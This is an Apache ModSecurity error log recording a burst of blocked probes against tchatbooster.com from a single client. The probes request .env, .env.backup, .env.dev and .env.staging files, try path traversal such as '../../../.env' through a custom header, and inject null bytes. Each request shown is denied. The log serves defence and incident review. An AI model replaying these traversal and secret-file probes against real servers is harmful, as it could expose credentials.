[Tue May 12 04:39:35.017651 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS581tk6y7yBJLpJop1gAAAIU"]
[Tue May 12 04:39:35.057579 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5jue9Sp-pIv_Bb61YgAAAVE"]
[Tue May 12 04:39:35.219880 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5jue9Sp-pIv_Bb61YwAAAUQ"], referer: https://tchatbooster.com/.env.staging
[Tue May 12 04:39:35.247208 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKS5zue9Sp-pIv_Bb61ZQAAAVE"]
[Tue May 12 04:39:35.247417 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKS5zue9Sp-pIv_Bb61ZQAAAVE"]
[Tue May 12 04:39:35.494728 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS581tk6y7yBJLpJop1gAAAIU"]
[Tue May 12 04:39:35.514470 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5zue9Sp-pIv_Bb61ZgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:35.514530 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5zue9Sp-pIv_Bb61ZgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:35.514558 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5zue9Sp-pIv_Bb61ZgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:35.514588 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5zue9Sp-pIv_Bb61ZgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:35.514810 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5zue9Sp-pIv_Bb61ZgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:35.514861 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5zue9Sp-pIv_Bb61ZgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:35.514910 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5zue9Sp-pIv_Bb61ZgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:35.515348 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 31)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5zue9Sp-pIv_Bb61ZgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:35.591217 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS581tk6y7yBJLpJop2AAAAIU"]
[Tue May 12 04:39:35.591296 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS581tk6y7yBJLpJop2AAAAIU"]
[Tue May 12 04:39:35.591468 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS581tk6y7yBJLpJop2AAAAIU"]
[Tue May 12 04:39:35.704402 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5zue9Sp-pIv_Bb61ZQAAAVE"]
[Tue May 12 04:39:35.726421 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKS581tk6y7yBJLpJop2QAAAII"], referer: https://tchatbooster.com/.env.backup
[Tue May 12 04:39:35.726652 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKS581tk6y7yBJLpJop2QAAAII"], referer: https://tchatbooster.com/.env.backup
[Tue May 12 04:39:36.024552 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 31 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5zue9Sp-pIv_Bb61ZgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:36.050430 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS581tk6y7yBJLpJop2AAAAIU"]
[Tue May 12 04:39:36.052479 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Due9Sp-pIv_Bb61ZwAAAVE"]
[Tue May 12 04:39:36.052524 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Due9Sp-pIv_Bb61ZwAAAVE"]
[Tue May 12 04:39:36.052551 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Due9Sp-pIv_Bb61ZwAAAVE"]
[Tue May 12 04:39:36.052760 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Due9Sp-pIv_Bb61ZwAAAVE"]
[Tue May 12 04:39:36.052790 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Due9Sp-pIv_Bb61ZwAAAVE"]
[Tue May 12 04:39:36.053224 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Due9Sp-pIv_Bb61ZwAAAVE"]
[Tue May 12 04:39:36.073013 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS6Due9Sp-pIv_Bb61aAAAAUQ"], referer: https://tchatbooster.com/css../../.env
[Tue May 12 04:39:36.073225 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS6Due9Sp-pIv_Bb61aAAAAUQ"], referer: https://tchatbooster.com/css../../.env
[Tue May 12 04:39:36.220368 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS581tk6y7yBJLpJop2QAAAII"], referer: https://tchatbooster.com/.env.backup
[Tue May 12 04:39:36.243241 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKS6M1tk6y7yBJLpJop3AAAAIU"]
[Tue May 12 04:39:36.243447 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKS6M1tk6y7yBJLpJop3AAAAIU"]
[Tue May 12 04:39:36.509540 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6Due9Sp-pIv_Bb61ZwAAAVE"]
[Tue May 12 04:39:36.526920 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6M1tk6y7yBJLpJop3QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:36.526970 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6M1tk6y7yBJLpJop3QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:36.526997 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6M1tk6y7yBJLpJop3QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
